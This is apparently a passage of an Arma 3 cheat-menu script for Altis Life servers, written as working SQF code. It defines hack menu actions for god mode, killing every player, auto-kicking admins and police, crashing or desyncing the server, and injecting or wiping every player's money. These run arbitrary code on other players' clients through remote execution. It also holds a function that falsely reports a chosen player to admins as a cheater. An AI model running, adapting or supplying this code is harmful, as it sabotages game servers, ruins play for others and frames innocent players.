    TargetAll= player addAction ["<t color='#FF0000'>Close</t>","[]spawn NxIrecommendMain;"];
    player removeaction TargetAllBanner2;
    TargetAllBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction E5P;
    E5P= player addAction ["ESP","[]spawn IrEeEeEeComMMMenNEnd_IrEeEeEeComMMMenNEnd_aE5Pj"];
    player removeaction glbgod;
    glbgod= player addAction ["Godmode On","[]spawn IreCoMMmeNEnNDNdnNDEASD_JesuseMode_a"];
    player removeaction glbgodoff;
    glbgodoff= player addAction ["Godmode off","[]spawn IreCoMMmeNEnNDNdnNDEASD_JesuseModeOff_a"];
    player removeaction Tmed;
    Tmed= player addAction ["Time Day", "[]spawn IreCoMMmeNEnNDNdnNDEASD_TimeD"];
    player removeaction TmeN;
    TmeN= player addAction ["Time Night", "[]spawn IreCoMMmeNEnNDNdnNDEASD_TimeN"];
    player removeaction tpalllda;
    tpalllda= player addAction ["Tp all", "[]spawn IreCoMMmeNEnNDNdnNDEASD_TPAll_a"];
    player removeaction FfIXxfPpsS;
    FfIXxfPpsS= player addAction ["Fix FPS", {_class = (nearestObjects [[6800, 9200, 0], ["Man", "Land_Fire", "MedBox0", "wire_cat1", "Hedgehog", "Sandbag1", "BearTrap", "WeaponHolder"], 11000]) + allDead;{if (_x != objNull) then{deleteVehicle _x;[format ["Deleted %1", typeOf _x], "PLAIN", 1];};sleep 0.05;} forEach _class;}];
    player removeaction killaa;
    killaa= player addAction ["Kill All Player", {_list = player nearEntities 20000; { _x setDamage 1; } forEach(_list);}];
    player removeaction EDDText;
    EDDText= player addAction ["3D Text",{closedialog 0;if (isNil "IRREEECOMMMMMANNNNNDDD_atext") then {IRREEECOMMMMMANNNNNDDD_atext = 0;};if (IRREEECOMMMMMANNNNNDDD_atext == 0) then {IRREEECOMMMMMANNNNNDDD_atext = 1;hint "3D Text ON";_3d = "[] spawn{disableSerialization;if (isNil ""BIS_fnc_3dCredits_n"") then {BIS_fnc_3dCredits_n = 2733;};BIS_fnc_3dCredits_n cutRsc [""rscDynamicText"", ""PLAIN""];BIS_fnc_3dCredits_n = BIS_fnc_3dCredits_n + 1;_ctrl = ((uiNamespace getvariable ""BIS_dynamicText"") displayctrl 9999);_ctrl ctrlShow true; _ctrl ctrlEnable true; _ctrl ctrlSetFade 0;tdtext = true;while {tdtext} do{if !(tdtext) exitWith {};_pos = [(getPosATL player) select 0, (getPosATL player) select 1, ((getPosATL player) select 2) + 2];_pos2D = worldToScreen _pos;if (count _pos2D > 0) then{_ctrl ctrlSetPosition [(_pos2D select 0) - (safezoneW / 2), (_pos2D select 1), safezoneW, safezoneH];_text = parseText ""<t size='0.8' color='#FF1AAA'>Server geowned  =P</t>"";_ctrl ctrlSetStructuredText _text;_ctrl ctrlCommit 0;};};_ctrl ctrlShow false;_ctrl ctrlEnable false;};";[_3d] call DurkSintax_Pro_RE;} else {IRREEECOMMMMMANNNNNDDD_atext = 0;hint "3D Text OFF";_3d = "tdtext = false; tdtext = nil";[_3d] call DurkSintax_Pro_RE;};}];
    player removeaction DESS;
    DESS= player addAction ["Desync Server","[]spawn Irecommend_MegaDesync"];
    player removeaction KickAdmin;
    KickAdmin= player addAction ["Kick <t color='#FF0000'>Admins</t>", {if (isnil("Kick_Admins")) then {Kick_Admins = 0;};if (Kick_Admins == 0) then {Kick_Admins = 1;hint "Auto Admin Kick ON - ";}else{Kick_Admins = 0;hint "Auto Admin Kick OFF - ";};while {Kick_Admins == 1}do{autokick = format["if(call life_adminlevel > 0) then {failMission'LOSER';0 fadeSound 0;for'_l39'from 0 to 100 do{(findDisplay _l39)closeDisplay 0;};};", autokick];[autokick] call DurkSintax_Pro_RE;onEachFrame {nil};}; onEachFrame {nil};}];
    player removeaction KickCops;
    KickCops= player addAction ["Kick <t color='#0000FF'>Cops</t>", {if (isnil("Cop_Admins")) then {  Cop_Admins = 0;   };   if (Cop_Admins == 0) then {   Cop_Admins = 1;      hint "Auto Cop Kick ON - "; } else {    Cop_Admins = 0;  hint "Auto Cop Kick OFF - ";  };  while {Cop_Admins == 1} do {	autokick = format["if(call life_coplevel > 0) then {failMission'LOSER';0 fadeSound 0;for'_l39'from 0 to 100 do{(findDisplay _l39)closeDisplay 0;};};", autokick];[autokick] call DurkSintax_Pro_RE;sleep 15;};  }];
    player removeaction KickServer;
    KickServer= player addAction ["ServerDown", {autokick = format["if(1 == 1) then {failMission'LOSER';0 fadeSound 0;for'_l39'from 0 to 100 do{(findDisplay _l39)closeDisplay 0;};};", autokick];[autokick] call DurkSintax_Pro_RE;hint "All Players has been kicked"; }];
    //player removeaction VFBnr;
    //VFBnr= player addAction ["<t color='#7F25E0'>===Visual Filter===</t>", ""];
    player removeaction morecmso;
    morecmso= player addAction ["<t color='#7F25E0'>===more coming soon===</t>", ""];
    AltisMenue={removeallactions player;
    player removeaction CloeAltis;
    CloeAltis= player addAction ["<t color='#FF0000'>Close</t>", "[]spawn NxIrecommendMain"];
    player removeaction LizMenueLoad;
    LizMenueLoad= player addAction ["<t color='#00FF00'>Lizenz Menue</t>", "[]spawn LizenzM"];
    player removeaction AltisBanner2;
    AltisBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction SpawnCi;
    SpawnCi= player addAction ["<t color='#7F25E0'>===Spawn===</t>", ""];
    SpawnMariu={[true,"marijuana",1] call life_fnc_handleInv;};
    player removeaction spawnMa;
    spawnMa= player addAction ["Spawn marijuana","[]spawn SpawnMariu"];
    SpawnSpike={[true,"spikeStrip",10] call life_fnc_handleInv;};
    player removeaction spawnSp;
    spawnSp= player addAction ["Spawn spikeStrip","[]spawn SpawnSpike"];
    player removeaction Civi;
    Civi= player addAction ["<t color='#7F25E0'>===Civi===</t>", ""];
    player removeaction getkey;
    getkey= player addAction ["GetTargetKey","[]spawn DurkSintax_GetTargetKey"];
    player removeaction jailescpe;
    jailescpe= player addAction ["JailEscape","[]spawn DurkSintax_JailEscape"];
    player removeaction unrstrnme;
    unrstrnme= player addAction ["Unrestrain","[]spawn DurkSintax_UnrestrainMyself"];
    player removeaction nmretzr;
    nmretzr= player addAction ["No more tazer","[]spawn IreeecOMMMaAndDnd_AL_NoTaze"];
    player removeaction nmri;
    nmri= player addAction ["No Illegal Items","[]spawn Ddasdaw_AL_NoIllegal"];
    player removeaction Cop;
    Cop= player addAction ["<t color='#7F25E0'>===Cop===</t>", ""];
    player removeaction rstr;
    rstr= player addAction ["GetTargetKey","[]spawn DurkSintax_RestrainTarget"];
    player removeaction escortta;
    escortta= player addAction ["EscortPlayerTarget","[]spawn DurkSintax_EscortPlayer"];
    player removeaction impovhil;
    impovhil= player addAction ["Impound vehicle","[]spawn NuuuuRdalkjda_AL_Impound"];
    player removeaction stopescortta;
    stopescortta= player addAction ["Stop EscortPlayerTarget","[]spawn DurkSintax_StopEscortPlayer"];
    player removeaction jailtgt;
    jailtgt= player addAction ["JailTarget","[]spawn DurkSintax_JailTarget"];
    player removeaction moneyyy;
    moneyyy= player addAction ["<t color='#7F25E0'>===Money===</t>", ""];
    player removeaction mnyATM;
    mnyATM= player addAction ["10k Money geben (ATM) ","life_atmbucks = life_atmbucks + 100000"];
    player removeaction mny;
    mny= player addAction ["100k Money geben","life_Cash = life_Cash + 100000"];
    player removeaction mnyyy;
    mnyyy= player addAction ["500k Money geben","life_Cash = life_Cash + 500000"];
    player removeaction money_TTt;
    money_TTt= player addAction ["1Mil.Target","[]spawn Spyglassistschlecht_Cash_1mill_t"];
    player removeaction mnyy;
    mnyy= player addAction ["1Mio. Money geben","life_Cash = life_Cash + 1000000"];
    player addAction ["1Mio. allen Spielern geben", {	_share = "	life_cash = life_cash + 1000000;";	[_share] call DurkSintax_Pro_RE;}];
    player addAction ["5Mio. allen Spielern geben", {	_share = "	life_cash = life_cash + 5000000;";	[_share] call DurkSintax_Pro_RE;}];
    player addAction ["10Mio. allen Spielern geben", {	_share = "	life_cash = life_cash + 10000000;";	[_share] call DurkSintax_Pro_RE;}];
    player addAction ["Geld jedem Spieler loeschen", {	_share = "	life_cash = 0; 	life_atmcash = 0;	";	[_share] call DurkSintax_Pro_RE;}];
    SpawnMenue={removeallactions player;
    player removeaction closespawn;
    closespawn= player addAction ["<t color='#FF0000'>Close</t>","[]spawn NxIrecommendMain"];
    player removeaction LoadoutMenueLoad;
    LoadoutMenueLoad= player addAction ["<t color='#00FF00'>Loadout Menue</t>", "[]spawn LoadoutMenue"];
    player removeaction SpawnBanner2;
    MainBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction clothing;
    clothing= player addAction ["Clothing", "removeUniform player; removeHeadgear player; removeVest player; player forceAddUniform 'U_IG_Guerilla2_1'; player addHeadgear 'H_Cap_blu'; player addVest 'V_BandollierB_khk';"];
    player removeaction bckpck;
    bckpck= player addAction ["Backpack+Items","player addBackpack 'B_Carryall_Base'; player addWeapon 'ItemWatch'; player addWeapon 'ItemCompass'; player addWeapon 'ItemGPS'; player addWeapon 'ItemRadio'; player addWeapon 'ItemMap';"];
    player removeaction crspw;
    crspw=player addAction ["Crate","[]spawn CrazyMotherFuckerDurkkkk_SpawnCrate"];
    player removeaction crspwdel;
    crspwdel=player addAction ["Delete Crate","[]spawn CrazyMotherFuckerDurkkkk_DelCrate"];
    player removeaction jtbs;
    jtbs= player addAction ["Spawn JetBus","[]spawn SpawwwnnnIrecommmmEnDndNd_JetBus"];
    player removeaction spwnveh2;
    spwnveh2= player addAction ["Spawn Hatchback","[]spawn SpawnHatchback"];
    player removeaction spwnveh3;
    spwnveh3= player addAction ["Spawn Truck","[]spawn SpawnTruck1"];
    player removeaction spwnveh4;
    spwnveh4= player addAction ["Spawn AH9","[]spawn SpawnHeli"];
    player removeaction spwnah9a;
    spwnah9a = player addAction ["Spawn AH9 (all)", {{"B_Heli_Light_01_armed_F" createVehicle position _x;} foreach playableUnits;}];
    player removeaction spwnah9p;
    spwnah9p =player addAction ["Spawn AH9 (plr)",{"B_Heli_Light_01_armed_F" createVehicle position player;}];
    LoadoutMenue={removeallactions player;
    player removeaction CloeLoad;
    CloeLoad= player addAction ["<t color='#FF0000'>Close</t>", "[]spawn SpawnMenue"];
    player removeaction LoadBanner2;
    LoadBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player addAction ["<t color='#00FF00'>Gear Editor</t>",{["Open",true] call BIS_fnc_arsenal;}];
    player removeaction VBnr;
    VBnr= player addAction ["<t color='#FF0000'>===Civi Loadout===</t>", ""];
    player removeaction civi1;
    civi1= player addAction ["Spawn Civi Gear 1",{removeUniform player;
    player forceAddUniform 'U_IG_Guerilla2_1';
    player addHeadgear 'H_Booniehat_tan';
    player addVest 'V_BandollierB_cbr';
    player addBackpack 'B_Carryall_oli';
    player addWeapon 'SMG_01_ACO_F';
    player addMagazines ["30Rnd_45ACP_Mag_SMG_01", 5];
    player addItemToBackpack 'NVGoggles';
    player addItemToBackpack 'G_Shades_Black';}];
    player removeaction civi2;
    civi2= player addAction ["Spawn Civi Gear 2",{removeUniform player;
    player forceAddUniform 'U_IG_Guerilla3_1';
    player addHeadgear 'H_Bandanna_khk';
    player addVest 'V_BandollierB_cbr';
    player addBackpack 'B_Carryall_oli';
    player addWeapon 'SMG_01_ACO_F';
    player addMagazines ["30Rnd_45ACP_Mag_SMG_01", 5];
    player addItemToBackpack 'NVGoggles';
    player addItemToBackpack 'G_Shades_Black';}];
    player removeaction mocmso;
    mocmso= player addAction ["<t color='#FF0000'>===Rebell Loadout===</t>", ""];
    player removeaction reb1;
    reb1= player addAction ["Spawn Rebell Gear 1",{removeUniform player;
    removeUniform player;
    player forceAddUniform 'U_O_SpecopsUniform_ocamo';
    player addHeadgear 'H_Bandanna_khk';
    player addVest 'V_TacVest_brn';
    player addBackpack 'B_Carryall_oli';
    player addWeapon 'arifle_Katiba_F';
    player addMagazines ["30Rnd_65x39_caseless_green", 5];
    player addItemToBackpack 'NVGoggles';
    player addItemToBackpack 'FirstAidKit';
    player addItemToBackpack 'optic_Arco';
    player addItemToBackpack 'G_Sport_Blackred';
    player addItemToBackpack 'muzzle_snds_H';;}];
    player removeaction reb2;
    reb2= player addAction ["Spawn Rebell Gear 2",{removeUniform player;
    removeUniform player;
    player forceAddUniform 'U_I_CombatUniform';
    player addHeadgear 'H_Shemag_olive';
    player addVest 'V_TacVest_brn';
    player addBackpack 'B_Carryall_oli';
    player addweapon 'srifle_EBR_ACO_F';
    player addMagazines ["20Rnd_762x51_Mag", 5];
    player addItemToBackpack 'G_Sport_Blackred';
    player addItemToBackpack 'muzzle_snds_B';
    player addItemToBackpack 'optic_Arco';;}];
    player removeaction amocmso;
    amocmso= player addAction ["<t color='#FF0000'>===Cops Loadout===</t>", ""];
    player removeaction cop1;
    cop1= player addAction ["Spawn Rekrut Gear 1",{removeUniform player;
    removeUniform player;
    player forceAddUniform 'U_Rangemaster';
    player addHeadgear 'H_Cap_headphones';
    player addVest 'V_TacVest_blk_POLICE';
    player addBackpack 'B_Carryall_ocamo';
    player addWeapon 'arifle_MXM_F';
    player addMagazines ["30Rnd_65x39_caseless_mag", 5];
    player addItemToBackpack 'optic_Arco';
    player addItemToBackpack 'G_Shades_Black';
    player addItemToBackpack 'muzzle_snds_H';;;}];
    player removeaction cop2;
    cop2= player addAction ["Spawn SWAT Gear 2",{removeUniform player;
    removeUniform player;
    player forceAddUniform 'U_B_CombatUniform_mcam';
    player addHeadgear 'H_Beret_blk_POLICE';
    player addVest 'V_TacVest_blk_POLICE';
    player addBackpack 'B_Carryall_ocamo';
    player addWeapon 'arifle_MXM_F';
    player addMagazines ["30Rnd_65x39_caseless_mag", 5];
    player addItemToBackpack 'NVGoggles';
    player addItemToBackpack 'optic_Arco';
    player addItemToBackpack 'G_Shades_Black';
    player addItemToBackpack 'muzzle_snds_H';;}];
    player removeaction aamocmso;
    aamocmso= player addAction ["<t color='#FF0000'>===Sonstiges Loadout===</t>", ""];
    player removeaction crspw;
    crspw=player addAction ["Crate","[]spawn CrazyMotherFuckerDurkkkk_SpawnCrate"];
    player removeaction crspwdel;
    crspwdel=player addAction ["Delete Crate","[]spawn CrazyMotherFuckerDurkkkk_DelCrate"];
    player removeaction Loadout1;
    Loadout1= player addAction ["LRR","[]spawn LoudoutIrecommend_LRRP"];
    player removeaction Loadout2;
    Loadout2= player addAction ["DMR","[]spawn LoudoutIrecommend_DMRP"];
    player removeaction Loadout3;
    Loadout3= player addAction ["EBR","[]spawn LoudoutIrecommend_EBRP"];
    player removeaction Loadout4;
    Loadout4= player addAction ["PDW","[]spawn LoudoutIrecommend_PDWP"];
    player removeaction Loadout5;
    Loadout5= player addAction ["Heavy","[]spawn LoudoutIrecommend_HEAVYP"];
    player removeaction Loadout6;
    Loadout6= player addAction ["MXM","[]spawn LoudoutIrecommend_MXMP"];
    player removeaction Loadout7;
    Loadout7= player addAction ["TRG 21","[]spawn LoudoutIrecommend_TRGP"];
    player removeaction Loadout8;
    Loadout8= player addAction ["Scuba Steve","[]spawn LoudoutIrecommend_UNDERWATERP"];
    player removeaction Loadout9;
    Loadout9= player addAction ["Police Academy","[]spawn LoudoutIrecommend_ALTISP"];
    player removeaction kart;
    kart= player addAction ["Kart mit Auto",{removeUniform player;
    player forceAddUniform 'U_C_Driver_1_red';
    player addHeadgear 'H_RacingHelmet_1_red_F';
    player addBackpack 'B_Carryall_oli';
    player addMagazines ["6Rnd_RedSignal_F", 5];
    player addWeapon 'hgun_Pistol_Signal_F';
    _veh = createVehicle ["C_Kart_01_F", position player, [], 0, "NONE"];}];
    LizenzM={Irecommend_LicenseDrive={hint"Buy License Driver Menu";player addAction[format["%1 ($%2)",["license_civ_driver"] call life_fnc_varToStr,[(["driver"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"driver",0,false,false,"",' !license_civ_driver && playerSide == civilian '];};
    Irecommend_LicenseBoat={hint"Buy License Boat Menu";player addAction[format["%1 ($%2)",["license_civ_boat"] call life_fnc_varToStr,[(["boat"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"boat",0,false,false,"",' !license_civ_boat && playerSide == civilian '];};
    Irecommend_LicensePilot={hint"Buy License Pilot Menu";player addAction[format["%1 ($%2)",["license_civ_air"] call life_fnc_varToStr,[(["pilot"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"pilot",0,false,false,"",' !license_civ_air && playerSide == civilian '];};
    Irecommend_LicenseTruck={hint"Buy License Truck Menu";player addAction[format["%1 ($%2)",["license_civ_truck"] call life_fnc_varToStr,[(["truck"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"truck",0,false,false,"",' !license_civ_truck && playerSide == civilian '];};
    Irecommend_LicenseCivGun={hint"Buy License Gun Menu";player addAction[format["%1 ($%2)",["license_civ_gun"] call life_fnc_varToStr,[(["gun"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"gun",0,false,false,"",' !license_civ_gun && playerSide == civilian '];};
    Irecommend_LicenseSalt={hint"Buy License Salt Menu";player addAction[format["%1 ($%2)",["license_civ_salt"] call life_fnc_varToStr,[(["salt"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"salt",0,false,false,"",' !license_civ_salt && playerSide == civilian '];};
    Irecommend_LicenseWeed={hint"Buy License Weed Menu";player addAction[format["%1 ($%2)",["license_civ_marijuana"] call life_fnc_varToStr,[(["marijuana"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"marijuana",0,false,false,"",' !license_civ_marijuana && playerSide == civilian '];};
    Irecommend_LicenseDiamond={hint"Buy License Diamond Menu";player addAction[format["%1 ($%2)",["license_civ_diamond"] call life_fnc_varToStr,[(["diamond"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"diamond",0,false,false,"",' !license_civ_diamond && playerSide == civilian '];};
    Irecommend_LicenseIron={hint"Buy License Iron Menu";player addAction[format["%1 ($%2)",["license_civ_iron"] call life_fnc_varToStr,[(["iron"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"iron",0,false,false,"",' !license_civ_iron && playerSide == civilian '];};
    Irecommend_LicenseCopper={hint"Buy License Copper Menu";player addAction[format["%1 ($%2)",["license_civ_copper"] call life_fnc_varToStr,[(["copper"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"copper",0,false,false,"",' !license_civ_copper && playerSide == civilian '];};
    Irecommend_LicenseDiving={hint"Buy License Diving Menu";player addAction[format["%1 ($%2)",["license_civ_dive"] call life_fnc_varToStr,[(["dive"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"dive",0,false,false,"",' !license_civ_dive && playerSide == civilian '];};
    Irecommend_LicenseCoke={hint"Buy License Coke Menu";player addAction[format["%1 ($%2)",["license_civ_coke"] call life_fnc_varToStr,[(["cocaine"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"cocaine",0,false,false,"",' !license_civ_coke && playerSide == civilian '];};
    Irecommend_LicenseCiment={hint"Buy License Ciment Menu";player addAction[format["%1 ($%2)",["license_civ_cement"] call life_fnc_varToStr,[(["cement"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"cement",0,false,false,"",' !license_civ_cement && playerSide == civilian '];};
    Irecommend_LicenseHeroin={hint"Buy License Heroin Menu";player addAction[format["%1 ($%2)",["license_civ_heroin"] call life_fnc_varToStr,[(["heroin"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"heroin",0,false,false,"",' !license_civ_heroin && playerSide == civilian '];};
    Irecommend_LicenseRebel={hint"Buy License Rebel Menu";player addAction[format["%1 ($%2)",["license_civ_rebel"] call life_fnc_varToStr,[(["rebel"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"rebel",0,false,false,"",' !license_civ_rebel && playerSide == civilian '];};
    Irecommend_LicenseSand={hint"Buy License Sand Menu";player addAction[format["%1 ($%2)",["license_civ_sand"] call life_fnc_varToStr,[(["sand"] call life_fnc_licensePrice)] call life_fnc_numberText],life_fnc_buyLicense,"sand",0,false,false,"",' !license_civ_sand && playerSide == civilian '];};
    removeallactions player;
    player removeaction CloeLizenz;
    CloeLizenz= player addAction ["<t color='#FF0000'>Close</t>", "[]spawn AltisMenue"];
    //player removeaction AllLl;
    //AllLl= player addAction ["<t color='#70E834'>All liscenses</t>", "[]spawn IreeecOMMMaAndDndEDasd_AL_Liscenses"];
    player removeaction LizenzBanner2;
    AltisBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction drive;
    drive= player addAction ["Drive","[]spawn Irecommend_LicenseDrive"];
    player removeaction boat;
    boat= player addAction ["Boat","[]spawn Irecommend_LicenseBoat"];
    player removeaction Pilot;
    Pilot= player addAction ["Pilot","[]spawn Irecommend_LicensePilot"];
    player removeaction truck;
    truck= player addAction ["Truck","[]spawn Irecommend_LicenseTruck"];
    player removeaction gun;
    gun= player addAction ["Civi Guns","[]spawn Irecommend_LicenseCivGun"];
    player removeaction Rebel;
    Rebel= player addAction ["Rebel","[]spawn Irecommend_LicenseRebel"];
    player removeaction salz;
    salz= player addAction ["Salt","[]spawn Irecommend_LicenseSalt"];
    player removeaction weed;
    weed= player addAction ["Weed","[]spawn Irecommend_LicenseWeed"];
    player removeaction Diamond;
    Diamond= player addAction ["Diamond","[]spawn Irecommend_LicenseDiamond"];
    player removeaction Iron;
    Iron= player addAction ["Iron","[]spawn Irecommend_LicenseIron"];
    player removeaction Copper;
    Copper= player addAction ["Copper","[]spawn Irecommend_LicenseCopper"];
    player removeaction Diving;
    Diving= player addAction ["Diving","[]spawn Irecommend_LicenseDiving"];
    player removeaction cocaine;
    cocaine= player addAction ["Cocaine","[]spawn Irecommend_LicenseCoke"];
    player removeaction Ciment;
    Ciment= player addAction ["Ciment","[]spawn Irecommend_LicenseCiment"];
    player removeaction Heroin;
    Heroin= player addAction ["Heroin","[]spawn Irecommend_LicenseHeroin"];
    player removeaction Sand;
    Sand= player addAction ["Sand","[]spawn Irecommend_LicenseSand"];
    DurkSintax_GodMode_t={_l23=cursorTarget;if(isNil"GodLolPenis")then{GodLolPenis=true;gnamearr=[];};if!(_l23 in gnamearr)then{hint format["God Mode on %1 Activated",_l23];gnamearr=gnamearr+[_l23];}else{hint format["God Mode on %1 Deactivated",_l23];gnamearr=gnamearr-[_l23];};_l108=format["if(name player=='%1')then{if(isNil'gmdlol')then{gmdlol=true;player removeAllEventHandlers'handleDamage';player addEventHandler['handleDamage',{false}];player allowDamage false;}else{player addEventHandler['handleDamage',{true}];player removeAllEventHandlers'handleDamage';player allowDamage true;gmdlol=nil;};};",_l23];[_l108]call DurkSintax_Pro_RE;};
    IreeecOMMMaAndDnd_AL_NoTaze = {life_fnc_tazed = 0;["TaskSucceeded", ["", "Die Cops können dich nicht mehr tazern!"]] call bis_fnc_showNotification;};
    IreeecOMMMaAndDndEDasd_AL_Liscenses = {{missionnamespace setVariable[(_x select 0), true];}foreach life_licenses;["TaskSucceeded", ["", "Alle Lizenzen hinzugefügt!"]] call bis_fnc_showNotification;};
    NuuuuRdalkjda_AL_Impound = {_this spawn life_fnc_impoundAction;["TaskSucceeded", ["", "Fahrzeug abgeschleppt!"]] call bis_fnc_showNotification;};
    SpyglassFakeTrigger={_GAPERNAME = name cursorTarget;_GAPERuid = getPlayerUID cursorTarget;[[_GAPERNAME,_GAPERuid,"MenuBasedHack_DISPLAY_162"],"SPY_fnc_cookieJar",false,false] spawn BIS_fnc_MP;
    [[_GAPERNAME,"Menu Hack: DISPLAY 162 (Lystic & Bobby Menu Hack)"],"SPY_fnc_notifyAdmins",true,false] spawn BIS_fnc_MP;};
    U_N_L_I_ME={if(isnil("Irecommend_Unlim_Ammo"))then{Irecommend_Unlim_Ammo=0;};if(Irecommend_Unlim_Ammo==0)then{Irecommend_Unlim_Ammo=1;cutText[format["Unlimited Ammo on"],"PLAIN DOWN"];hint"Unlimited Ammo on";}else{Irecommend_Unlim_Ammo=0;cutText[format["Unlimited Ammo Off"],"PLAIN DOWN"];hint"Unlimited Ammo Off";};while{Irecommend_Unlim_Ammo==1}do{_l25=primaryWeapon player;_l31=secondaryWeapon player;player setAmmo[_l25,999];player setAmmo[_l31,999];(vehicle player)setVehicleAmmo 1;(vehicle player)setVehicleAmmo 1;sleep 0.01;};};
    FuckTonicInTheAssHole_VehM={if!("ItemMap"in items player)then{player addweapon"ItemMap";};if(isnil"FuckTonicInTheAssHole_Veh_M")then{FuckTonicInTheAssHole_Veh_M=0;};if(FuckTonicInTheAssHole_Veh_M==0)then{FuckTonicInTheAssHole_Veh_M=1;hint"Vehicle Markers ON";}else{FuckTonicInTheAssHole_Veh_M=0;hint"Vehicle Markers OFF";};while{FuckTonicInTheAssHole_Veh_M==1}do{{FuckTonicInTheAssHole_Veh_Markers=str _x;deleteMarkerLocal FuckTonicInTheAssHole_Veh_Markers;FuckTonicInTheAssHole_Veh_Markers=createMarkerLocal[FuckTonicInTheAssHole_Veh_Markers,visiblePosition _x];FuckTonicInTheAssHole_Veh_Markers setMarkerTypeLocal"waypoint";FuckTonicInTheAssHole_Veh_Markers setMarkerPosLocal visiblePosition _x;FuckTonicInTheAssHole_Veh_Markers setMarkerSizeLocal[0.5,0.5];FuckTonicInTheAssHole_Veh_Markers setMarkerTextLocal format['%1',typeOf _x];if((_x isKindOf"Air")||(_x isKindOf"Tank"))then{FuckTonicInTheAssHole_Veh_Markers setMarkerColorLocal("ColorRed");}else{FuckTonicInTheAssHole_Veh_Markers setMarkerColorLocal("ColorBlue");};}forEach vehicles;sleep 1;};{FuckTonicInTheAssHole_Veh_Markers=str _x;deleteMarkerLocal FuckTonicInTheAssHole_Veh_Markers;}forEach vehicles;};
    HealMePlease_NOT={if(!(isNil"TonicistschlechtLololol__GUI_R")or!(isNil"TonicistschlechtLololol__originalPlayer"))then{r_player_handler=false;r_player_handler1=false;r_player_dead=false;r_player_unconscious=false;r_player_infected=false;r_player_injured=false;r_player_inpain=false;r_player_loaded=false;r_player_cardiac=false;r_fracture_legs=false;r_fracture_arms=false;r_player_blood=12000;r_player_lowblood=false;r_player_timeout=0;r_handlerCount=0;TonicistschlechtLololol__hunger=0;TonicistschlechtLololol__thirst=0;TonicistschlechtLololol__temperatur=42;player setDamage 0;vehicle player setDamage 0;}else{player setDamage 0;vehicle player setDamage 0;};cutText[format["Healed"],"PLAIN DOWN"];};
    GodModePlease_NOT={if(!(isNil"TonicistschlechtLololol__GUI_R")or!(isNil"TonicistschlechtLololol__originalPlayer"))then{if(isNil"Irecommend_God_ModeLOL")then{Irecommend_God_ModeLOL=true;};if(Irecommend_God_ModeLOL)then{Irecommend_God_ModeLOL=false;hint"GOD ON";cutText[format["GOD ON"],"PLAIN"];_l32=player;fnc_usec_damageHandler=nil;fnc_usec_unconscious=nil;_l32 removeAllEventHandlers"handleDamage";_l33=false;_l32 addEventHandler["handleDamage",{}];_l32 allowDamage false;}else{Irecommend_God_ModeLOL=true;hint"GOD OFF";cutText[format["GOD OFF"],"PLAIN"];fnc_usec_damageHandler=compile preprocessFileLineNumbers"\z\addons\TonicistschlechtLololol__code\compile\fn_damageHandler.sqf";fnc_usec_unconscious=compile preprocessFileLineNumbers"\z\addons\TonicistschlechtLololol__code\compile\fn_unconscious.sqf";player removeAllEventHandlers"handleDamage";player addEventHandler["handleDamage",{true}];player allowDamage true;};}else{if(isNil"I_R_E_C_O_Ml_G0d_Mode")then{I_R_E_C_O_Ml_G0d_Mode=0;};if(I_R_E_C_O_Ml_G0d_Mode==0)then{I_R_E_C_O_Ml_G0d_Mode=1;hint"GOD ON";cutText[format["GOD ON"],"PLAIN"];fnc_usec_damageHandler={};fnc_usec_unconscious={};player removeAllEventHandlers"handleDamage";player addEventHandler["handleDamage",{false}];player allowDamage false;}else{I_R_E_C_O_Ml_G0d_Mode=0;hint"GOD OFF";cutText[format["GOD OFF"],"PLAIN"];player addEventHandler["handleDamage",{true}];player removeAllEventHandlers"handleDamage";player allowDamage true;};};};
    SpawnOffroad={"C_Offroad_01_F" createVehicle (getPosAtl player);};
    SpawnHatchback={_toSpawn = "C_Hatchback_01_sport_F" createVehicle position player;};
    SpawnTruck1={_toSpawn = "B_Truck_01_covered_F" createVehicle position player;};
    SpawnHeli={"B_Heli_Light_01_F" createVehicle (getPosAtl player);};
    DurkSintax_UnrestrainMyself={hint"UnRestrain Enabled!";cutText ["UnRestrain Enabled!","PLAIN"];cutText[format["UnRestrain Enabled"],"PLAIN DOWN"];player setVariable["restrained",FALSE,TRUE];};
    DurkSintax_UnrestrainTarget={hint"UnRestrain Enabled!";cutText ["UnRestrain Enabled!","PLAIN"];cutText[format["UnRestrain Enabled"],"PLAIN DOWN"];cursorTarget setVariable["restrained",FALSE,TRUE];};
    DurkSintax_RestrainTarget={hint"Restrain Player Cursor Target Enabled!";cutText ["Restrain Player Cursor Target Enabled!","PLAIN"];cutText[format["Restrain Player Cursor Target Enabled"],"PLAIN DOWN"];cursorTarget setVariable["restrained",true,true];  [[player], "life_fnc_restrain", _unit, false] spawn life_fnc_MP;  [[0,format["", name cursorTarget, name player]],"life_fnc_broadcast",west,false] spawn life_fnc_MP;};
    DurkSintax_StopEscortMyself={hint"Stop Escort Enabled!";cutText ["Stop Escort Enabled!","PLAIN"];cutText[format["Stop Escort Enabled"],"PLAIN DOWN"];detach player; player setVariable["Escorting",false,true]; player setVariable["restrained",FALSE,TRUE];};
